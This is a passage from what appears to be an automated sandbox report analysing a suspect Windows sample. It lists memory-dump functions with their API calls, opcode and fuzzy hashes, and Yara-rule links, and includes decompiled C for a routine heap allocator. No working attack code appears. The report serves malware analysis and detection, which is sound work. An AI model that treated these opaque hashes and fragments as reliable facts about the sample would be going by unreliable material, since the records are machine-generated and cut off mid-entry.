                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0223A606
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: ced6acedbeabefc6986888ab38b4dc8389a03222db35aa3f858d2a74ab71d424
                • Instruction ID: e7773328c9020c50183472cfd175a836606d53b9e1562a633e3525811268da72
                • Opcode Fuzzy Hash: ced6acedbeabefc6986888ab38b4dc8389a03222db35aa3f858d2a74ab71d424
                • Instruction Fuzzy Hash: CA11B172409380AFDB228F51DC44B62FFF4EF4A610F0884DAED858B262D336A419DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BF0F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0223BF79
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 38ca505b773d14edd53364c3a1f1992f202a1c70b793bd58298694fd6d744df0
                • Instruction ID: 5a519e079a12c6b67b6cc5b9ed945e4978c9b9091febb1eeb5d4689054febafb
                • Opcode Fuzzy Hash: 38ca505b773d14edd53364c3a1f1992f202a1c70b793bd58298694fd6d744df0
                • Instruction Fuzzy Hash: 7611D3715093C0AFDB228F25DC45B66FFB4EF06220F0885EEED858B563D365A418CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C70205, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                APIs
                • DispatchMessageW.USER32(?), ref: 04C70270
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 59f703157f0b8435b85f960ad57b05e3de9faf438f70492253f670cd84447047
                • Instruction ID: 1976477a060ac5c5e7a9f7b9bade7031a07e4f024aeb53a74fe6f46db0304d6a
                • Opcode Fuzzy Hash: 59f703157f0b8435b85f960ad57b05e3de9faf438f70492253f670cd84447047
                • Instruction Fuzzy Hash: ED117C7580D3C0AFD7128F259C44B62BFB4EF47624F0984DAED848F263D2696908CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BADE, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32 ref: 0223BB4A
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 55d39998977724cb254346ec589fdbe14beebad41be4430610be03e5b07fe6b2
                • Instruction ID: 344d620b23242b19d4473be986a99b53115ed3cd3c02f78579fae6aa9401fc24
                • Opcode Fuzzy Hash: 55d39998977724cb254346ec589fdbe14beebad41be4430610be03e5b07fe6b2
                • Instruction Fuzzy Hash: FD117271408380AFDB228F55DC44BA6FFF4EF49320F0885AEED858B566D375A458CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C702B4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 8a9820b5ba59b6d512745a3b76bb3980ce62cb9816aa972c13b761146912cc85
                • Instruction ID: b6b72acefdd3097a15dafa4dad6df3c93b84e7624d6d196596b059c7230d24e7
                • Opcode Fuzzy Hash: 8a9820b5ba59b6d512745a3b76bb3980ce62cb9816aa972c13b761146912cc85
                • Instruction Fuzzy Hash: 8511A7715053809FD711CF26DC85B66BFE8EF41620F0884AAED49CF252D275E548CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223B572, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: ClassInfo
                • String ID:
                • API String ID: 3534257612-0
                • Opcode ID: 227bf7df9151333e2ba02ffffbcc98b77054a949eba9b9f1b654ebbdce0cac04
                • Instruction ID: 0d53b1a5e3ac6e42c6f855a202fcdf1bd89f7401b0ddd36dabf17f317969c5b0
                • Opcode Fuzzy Hash: 227bf7df9151333e2ba02ffffbcc98b77054a949eba9b9f1b654ebbdce0cac04
                • Instruction Fuzzy Hash: 990161B66102418FEB21CF59D884B66FBE4EF04724F08C06AED45CB655D771E408CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223A948, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 9c339767f095506a31a5099c3f2948442fe73f0faabec56f24313eaf7d73eeac
                • Instruction ID: 3352bb4f669b16194d57886edf834fd86b232d87b10e8e60d1c0b3b87d1f490d
                • Opcode Fuzzy Hash: 9c339767f095506a31a5099c3f2948442fe73f0faabec56f24313eaf7d73eeac
                • Instruction Fuzzy Hash: 9B118E71409784AFD722CF55DC85B62FFB4EF06720F09C4AAED858B262D375A418CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C702D2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 2319f28d435bc9c1b019be943684615070cb868bbaf65fe0083b106b0f62ba37
                • Instruction ID: 2dd1e952c7fa1e84a7be21e90adb9dd739faea8552c9a6f8948adde190eea4b1
                • Opcode Fuzzy Hash: 2319f28d435bc9c1b019be943684615070cb868bbaf65fe0083b106b0f62ba37
                • Instruction Fuzzy Hash: 3A018471A043409FDB60CF2AE885766FBD4EF00620F08C4AAED49CF646E675F508CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BB06, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32 ref: 0223BB4A
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 537562f71fc5e79a1bc19430b6bdbc8d6309e14ab91d5c6325fcc7397c8d08af
                • Instruction ID: 1ca0e3fe9241622946c432c9927306e81cb82b7414c61476ffa9a9fd4b831dee
                • Opcode Fuzzy Hash: 537562f71fc5e79a1bc19430b6bdbc8d6309e14ab91d5c6325fcc7397c8d08af
                • Instruction Fuzzy Hash: E101A171400340DFDB218F95D844BA6FBA1FF08720F0884AAEE898A62AD775A018CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223A5C2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0223A606
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 70f100e6a40ee701bf90930e50157e2eaf6d01f5d6a4fec2e96b0323e564bcf6
                • Instruction ID: b3af75087129ac299b40b4a3c96ce7c213f03613e6812c6b071fcde6f3709d85
                • Opcode Fuzzy Hash: 70f100e6a40ee701bf90930e50157e2eaf6d01f5d6a4fec2e96b0323e564bcf6
                • Instruction Fuzzy Hash: 5D01A171414740DFDF218F95D844B66FFE0EF08720F08846ADD894A655D375E019CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223B0CA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                Download Yara Rule
                APIs
                • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 0223B115
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 07d4e15f1f9366621afc5d7d91d4a74dd8253a02e414cc7ed7637cdfdf11777c
                • Instruction ID: 7655b9706cab3d5d46087ec53668b7c042b759e5c442fb082c0a8153df42f05a
                • Opcode Fuzzy Hash: 07d4e15f1f9366621afc5d7d91d4a74dd8253a02e414cc7ed7637cdfdf11777c
                • Instruction Fuzzy Hash: A601A271500200ABD210DF1ADC86B36FBA8FB88B20F14815AED084B741E231F515CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BF3E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0223BF79
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 3608482413675b1559d7bb36bae26dae7cbe98f8afebd9b49186f082fcba88b2
                • Instruction ID: 0c18d3ac824dd993d045eb9ac5840aaf9da91758e75a1b49f078ce122541018b
                • Opcode Fuzzy Hash: 3608482413675b1559d7bb36bae26dae7cbe98f8afebd9b49186f082fcba88b2
                • Instruction Fuzzy Hash: 5701DF71910340DFDB218F55E885B6AFBA0EF04724F08C4AEED898B666D771E418CF62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223BBC6, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0223BC01
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: eb1532f8ae104946de66289af129c967fae246024eff8395ce5b490d608f0d2c
                • Instruction ID: a4472c327d3fdc069484b85d7a99662f8ad9f0730d9dcff933900d7980f8638e
                • Opcode Fuzzy Hash: eb1532f8ae104946de66289af129c967fae246024eff8395ce5b490d608f0d2c
                • Instruction Fuzzy Hash: CD01DF71810340DFDB318F46E884B65FBA0EF04720F08C89ADD894B216D371A059CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0223A96A, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000017.00000002.327371634.000000000223A000.00000040.00000001.sdmp, Offset: 0223A000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: eb331c76e13c9b41a94988cbe01a7ae98b366caf654ac76ade4a843d4eb5cd3d
                • Instruction ID: 6d9c979f6c2bce3e5aa57dd3084105fd345984b9603f4b484328719b3d0477c9
                • Opcode Fuzzy Hash: eb331c76e13c9b41a94988cbe01a7ae98b366caf654ac76ade4a843d4eb5cd3d
                • Instruction Fuzzy Hash: 3401D175914740DFDB318F45E884B66FFA0EF04720F08C4AADD8A4B656C3B5A418CB72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C7023E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                Download Yara Rule
                APIs
                • DispatchMessageW.USER32(?), ref: 04C70270
                Memory Dump Source
                • Source File: 00000017.00000002.328008515.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: cdbdd18f605eecddedb70fa58386643e91ec5c30baab83f946f9ba501c13d737
                • Instruction ID: 0e46d5ec968bec2b9534f203b919544d1d0cbb45654e57a6f4c30cc4dd95363a
                • Opcode Fuzzy Hash: cdbdd18f605eecddedb70fa58386643e91ec5c30baab83f946f9ba501c13d737
                • Instruction Fuzzy Hash: A4F0AF36908740DFDB608F06E884775FFA0EF04720F08C4AADE894B656D2B5B508CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E2D58, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: ef2ec2ae09957ea9360f5d934dcbb043cc628f01a462a739e9198afcdb58d24d
                • Instruction ID: d4609d9fa54f2af2a5a3672470288e3a5ea0352f7f9431c889336bc0aef8d773
                • Opcode Fuzzy Hash: ef2ec2ae09957ea9360f5d934dcbb043cc628f01a462a739e9198afcdb58d24d
                • Instruction Fuzzy Hash: B741D571F04165CBCB12CF66C8485BEBB7BEBC5214B18C8BAC5169B645E631F842C792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E21F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID: r*+
                • API String ID: 0-3221063712
                • Opcode ID: ee39a0475dd3eff3594fd9c814109b864c723eb09d60d26f55c3e657576b7a95
                • Instruction ID: d4321c17046653c1f418a575ea63134f97ba2aeef4911b8d00d95449bdd3fd8e
                • Opcode Fuzzy Hash: ee39a0475dd3eff3594fd9c814109b864c723eb09d60d26f55c3e657576b7a95
                • Instruction Fuzzy Hash: 73411C30E08209DFCB49DFB6D4456BEBBF6BB44300F2088AAD41297365E774AA05DF52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E12A0, Relevance: .5, Instructions: 460COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a394e9918b93cb1c2ed35a437c262408be3a1d8931bb74b833a47ae254b0cff
                • Instruction ID: 93c32fb79b35e6cc5474ad5d132f98d8a654e3a467ebc44eeff95e605627729a
                • Opcode Fuzzy Hash: 7a394e9918b93cb1c2ed35a437c262408be3a1d8931bb74b833a47ae254b0cff
                • Instruction Fuzzy Hash: B722E374A00A05CFCB25DF25D484A6AB7F2FF88300B20C9A9D85A9B759DB34BD46CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02232477, Relevance: .2, Instructions: 181COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327361825.0000000002232000.00000040.00000001.sdmp, Offset: 02232000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 73d648964f82d2189cbfa038e5f1ab541b3b2b0ce615b8d2acd3a45da8323816
                • Instruction ID: 9b949f95369c6a2e96fc3bc663f2d2f9010e580a3b1384bbca8e08ad9049b003
                • Opcode Fuzzy Hash: 73d648964f82d2189cbfa038e5f1ab541b3b2b0ce615b8d2acd3a45da8323816
                • Instruction Fuzzy Hash: D95171E662E3D28FC7078BA468742947F745B5723474E52EBD984CF0DBD6148D4B8322
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E09A0, Relevance: .2, Instructions: 178COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c3a3ce6cf755cec076322cb04727ac73ece6dde5676dabca32f071a4722efbf
                • Instruction ID: f53916a4798cba8638f6760a59fb9c8b87fc46cf695e1da8d45eafa720bd393d
                • Opcode Fuzzy Hash: 2c3a3ce6cf755cec076322cb04727ac73ece6dde5676dabca32f071a4722efbf
                • Instruction Fuzzy Hash: D651B231B10215DFCF159BAAD854ABEB7F7BF84304F248966D446DB264DBB0AC05DB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E02E8, Relevance: .2, Instructions: 173COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c5db87e08cedce60e08f746e661bafe1fedcfc85a3af9e991b37fe93fd28f8f
                • Instruction ID: df6509fe2800b5c73939495ae63d3cfc64f209fde21bc260c6f9221f53b71c66
                • Opcode Fuzzy Hash: 9c5db87e08cedce60e08f746e661bafe1fedcfc85a3af9e991b37fe93fd28f8f
                • Instruction Fuzzy Hash: AB519030B042158FCB0ADF6AC4547BEBBF3EF89300F14846AD5069B365EA71AC46DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0BC0, Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 544a21d6156e22e6aaafdfaba650b7b8903709a4ec24a2c7bbac064a4a4bf826
                • Instruction ID: 2fd04286b907fcfa8f8461fe625466f7f56a8930bc4c8dc2e0b155623ebe665a
                • Opcode Fuzzy Hash: 544a21d6156e22e6aaafdfaba650b7b8903709a4ec24a2c7bbac064a4a4bf826
                • Instruction Fuzzy Hash: E841D731B05118CFC7168B6AC4146BE77E7AF89310F158476E906EF3A1DEB1AC06D792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0682, Relevance: .1, Instructions: 129COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd853223d7e1ed28576f0b54023c32ed5961aed23187e743e6c280ce712593e7
                • Instruction ID: e9845ce6688c13e6f517608574be10a23cfc4e0526996ce6197f2e9b254f3520
                • Opcode Fuzzy Hash: fd853223d7e1ed28576f0b54023c32ed5961aed23187e743e6c280ce712593e7
                • Instruction Fuzzy Hash: C441AE38A90250CFC719BBB5F81C67D7BA2AF807067148975E812CB268DFB15C169F91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E1458, Relevance: .1, Instructions: 128COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e284a13bceb1efc874570faf11cd9025df0b2f43be4061ba2acb055ec8f9792
                • Instruction ID: cc1731449e9c93af407a426137358ea2c98ffa535b0b029d4dbb212accc72dab
                • Opcode Fuzzy Hash: 0e284a13bceb1efc874570faf11cd9025df0b2f43be4061ba2acb055ec8f9792
                • Instruction Fuzzy Hash: BA511A34A00219CFDB25DF64D894BADBBB2BF58300F6044E9D40AAB365DB35AD85CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E02A1, Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf7840549b7d3c14f0c2535d3fc277594a6dc8a0b4d448a2396b7ec8e241e7f5
                • Instruction ID: af030bfdbab30709710971c7fc55c11d3d421c21d1c705779be383b053374657
                • Opcode Fuzzy Hash: bf7840549b7d3c14f0c2535d3fc277594a6dc8a0b4d448a2396b7ec8e241e7f5
                • Instruction Fuzzy Hash: E7418E30B04225CFCB15CF6AD0647BE7BB6EF89310F14486AD506AB355EBB1AC428B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E02DA, Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3eeb8095bae07205c3b2668c84498d7382ac08f5f1b6574f5d10411fbeb8f2d4
                • Instruction ID: 081c4502504f45f266470b2cf43ca6e0f3fa90bb68ef52d52eff06f037e10175
                • Opcode Fuzzy Hash: 3eeb8095bae07205c3b2668c84498d7382ac08f5f1b6574f5d10411fbeb8f2d4
                • Instruction Fuzzy Hash: 8C419370B002158FDB15CF6AC154BBEBBB6EF89310F144479D502AB3A5EBB1AC42CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E1290, Relevance: .1, Instructions: 101COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2ee90dae9f12d0569b466b0e7d2548e652929046aafbbc9f53b3677943df9dc
                • Instruction ID: 34cf0f0c97db512eabcfa3191562040d0651dd11f38ca217f3a7f8c95384fa99
                • Opcode Fuzzy Hash: d2ee90dae9f12d0569b466b0e7d2548e652929046aafbbc9f53b3677943df9dc
                • Instruction Fuzzy Hash: 71413834A04219CFCB25DF65D845BADBBB2BF49300F1044E9D44AAB755EB30AD84DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E20D0, Relevance: .1, Instructions: 99COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e59d6c8e52ad197f6fe789600e05eee5293036c9589a3b42e59979135a3d653
                • Instruction ID: 0b53ad516a863e425fe65c256c118f104496fb6fd8d9c4d05e3c4f094196c039
                • Opcode Fuzzy Hash: 4e59d6c8e52ad197f6fe789600e05eee5293036c9589a3b42e59979135a3d653
                • Instruction Fuzzy Hash: 3C318130B0424ADFCB16DFA9C880A7EBBBAEB85301B1088F6D5059B245EB31BD41C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E0006, Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a024c2b474f83d0d5e7226f718f87fab4f5c0cbf973c8c7379faab580cf2a9a
                • Instruction ID: 4ad6d0f044af13d483c5576dcaab1253104ad2c2a56e20cba2d7e651dfd7578e
                • Opcode Fuzzy Hash: 1a024c2b474f83d0d5e7226f718f87fab4f5c0cbf973c8c7379faab580cf2a9a
                • Instruction Fuzzy Hash: D731817461D3C1CFCB17ABB498645693FF1EE43204B0989DAD4C1CB19BEA79580ADB13
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E2C58, Relevance: .1, Instructions: 79COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ac31d57fc2ab8c4e8473949d0273cd3127b858541770e832c7fe07fe72ba52d
                • Instruction ID: 2e7b6f0cc6e462ad734c9e25fc94dbcdcf2eba197cb1432a07436bea68534e58
                • Opcode Fuzzy Hash: 1ac31d57fc2ab8c4e8473949d0273cd3127b858541770e832c7fe07fe72ba52d
                • Instruction Fuzzy Hash: 22212538708241DFC7168B37D488939BBEEAF86210B1549F6D446CB291EB61BC40C752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E25DE, Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20d3af93d07c0aa33c48af345b47894002001b07b50d858ee2d8807f8d495d47
                • Instruction ID: cf573c68e0138c3a7a8a4c721eedccc31e3fc092f8bfceda3358265a2743b6c9
                • Opcode Fuzzy Hash: 20d3af93d07c0aa33c48af345b47894002001b07b50d858ee2d8807f8d495d47
                • Instruction Fuzzy Hash: 84319234E00349CFDB21DFA6E4446AABBF6BF84304F24C6B9C4049B254DBB4A889CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E21E9, Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16a9dc98e366791a389b4e0333a113ba9054b0ff91a079583ea7c1d30ed304d4
                • Instruction ID: aa1bb9b40e33df45fe94b62d9893631ca96c78c3868e1b2066c00680c7da7966
                • Opcode Fuzzy Hash: 16a9dc98e366791a389b4e0333a113ba9054b0ff91a079583ea7c1d30ed304d4
                • Instruction Fuzzy Hash: 55314970E08209DFCB4ADBB6C0446BDBBB6BF54300F1049AAD40297356E635AA45DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 049E4190, Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327789193.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0414ae4bfa6aebe2eef42fae1b7717fa064b0517ac149905f9465f3b585423a
                • Instruction ID: 4dd725691c86fab0d0ee95af1482937593537f2cdada5d308a18fec5239b5909
                • Opcode Fuzzy Hash: c0414ae4bfa6aebe2eef42fae1b7717fa064b0517ac149905f9465f3b585423a
                • Instruction Fuzzy Hash: 2111D671B10216CBDB15EBF6E8045BF7AABAFD4300F11493AC91797385EE716800A7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 023D820D, Relevance: .1, Instructions: 67COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000017.00000002.327530649.00000000023D0000.00000040.00000040.sdmp, Offset: 023D0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7e5a37f01a08f8330e51114e5e0cc66798ccefe5716985a1445c0d87378af1f
                • Instruction ID: 29dc8bdc64676ff904af826895530c26867372ff4b5288e57590cb62612493c4
                • Opcode Fuzzy Hash: f7e5a37f01a08f8330e51114e5e0cc66798ccefe5716985a1445c0d87378af1f
